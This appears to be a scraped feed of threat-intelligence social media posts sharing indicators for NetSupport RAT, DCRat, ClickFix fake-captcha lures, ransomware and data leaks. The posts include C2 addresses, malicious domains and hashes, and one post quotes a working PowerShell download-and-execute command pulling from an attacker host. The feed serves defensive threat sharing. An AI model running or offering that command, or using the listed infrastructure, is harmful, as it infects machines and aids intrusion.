Coming up on my 1 year anniversary with Huntress ! Taking this opportunity to go over some things myself and the team have seen in intrusions and drop some tips on basic things you can do to make your network more immune to compromise. Let's start with initial access -

Germán Fernández Nico Tech Tips Also looks as related infra to cupertujo\.com: idaculipa\.com manzisuape\.com siperasul\.com

#netsupport #rat Samples Collection Updated/tagged bazaar.abuse.ch/browse/tag/Net… Client32.ini hashlist pastebin.com/YAXPGu2F thanks ܛܔܔܔܛܔܛܔܛ cc Mikhail Kasimov

⚠️ "New" #CrazyEvil campaign 🇷🇺 Landing domain: rivatalk[.]com As usual, there is a signed malware for Windows ("Heze Hongwei Network Technology Co., Ltd.") and one also for macOS. [+] Windows sample: virustotal.com/gui/file/4a802…

1/ My recent investigation uncovered more than $16.58M in payments since January 1, 2025 or $2.76M per month has been sent to North Korean IT workers hired as developers at various projects & companies. To put this in perspective payments range from $3K-8K per month meaning

⚠️ Entonces, el Instituto de Salud Pública de Chile 🇨🇱 está respondiendo a un ataque de #Qilin ransomware. Desde el pasado viernes 27, todos los sistemas y plataformas web del organismo se encuentran fuera de servicio, acumulando ya seis días de interrupción. Sin embargo, lo más

Low detected #DCRat from #Colombia abuse.ch Germán Fernández bazaar.abuse.ch/sample/d328f8c… C2: feb18.freeddns(.)org:8848

🚨#Chile🇨🇱: actor malicioso vende una base de datos con 248.589 datos del Malls & Outlets VIVO, Malls & Outlets VIVO en un foro de hacking. mallsyoutletsvivo[.]cl gracias TIAL. #ciberseguridad #latinoamérica #LATAM #databreach

🚨#Chile🇨🇱: El actor malicioso Tanaka filtra datos del servicio automotriz llamado leon.cl en un foro de hacking. #ciberseguridad #leak #dataleak #leaked #LATAM #latinoamérica

#netsupport #rat GatewayAddress=summer25hot.]org:443 88.218.93[.]71 Main Sample from abuse.ch 👇👇👇 bazaar.abuse.ch/browse/tag/sum… Client32.ini dabe4273412d4d8ae67e8bc1786b3eac ⚠️First Sub 2025-07-07 LIC 7215675bdba98bd30c8e89aafba519de ⚠️First Sub 2025-06-19 cc Mikhail Kasimov Kelsey

▪ http://148.135.120[.]162:8443/ #opendir with Go2bypass and something else 🤔 🔸 "svchost.exe": 28e318a9ed1580a14ef9b6a71d6a0ec5031aae9d2b748b2ed70c67cfa24a85b4 (Go2bypass) 🔸 "ws_linux_amd64": 6ce0e2df1698a965627bd7afa2cf58a86cdb3cc691a150b0ad0e19eaa49c0481 (VShell?) 🔸

#netsupport #rat client32.ini First Submission 2025-07-14 MD5 ec0df04e3acb6f4390e9b29fcfc38089 GatewayAddress=193.143.1.216:443 👇 bazaar.abuse.ch/sample/dba4f8b… cc Mikhail Kasimov ܛܔܔܔܛܔܛܔܛ TG Soft TomU | I'm still here... til the end 🕊️🇨🇭 Germán Fernández Gianni Amato Simplicio Sam L. Andrea (Drego) Draghetti 👨🏻‍💻 🎣

🔸 http://196.251.71[.]46/ #opendir The HTML pages abuse Microsoft's search-ms URI protocol to open a remote WebDAV server at 45.151.62[.]238 and initiate the infection chain via LNK files that look like PDF's 😏 [+] "Adobe Acrobat.exe": bazaar.abuse.ch/sample/1cdce73…

#booking #fakecaptcha #clickfix 👇 https://admin-properties-captcha.]com/sign-in? 👇 powershell -Command "iex ((New-Object Net.WebClient).DownloadString('https://bknpnt.]com/bkngpntqow'))" Samples👇 bazaar.abuse.ch/browse/tag/bkn… ▶️AnyRun app.any.run/tasks/3deb10bd… cc Mikhail Kasimov Kelsey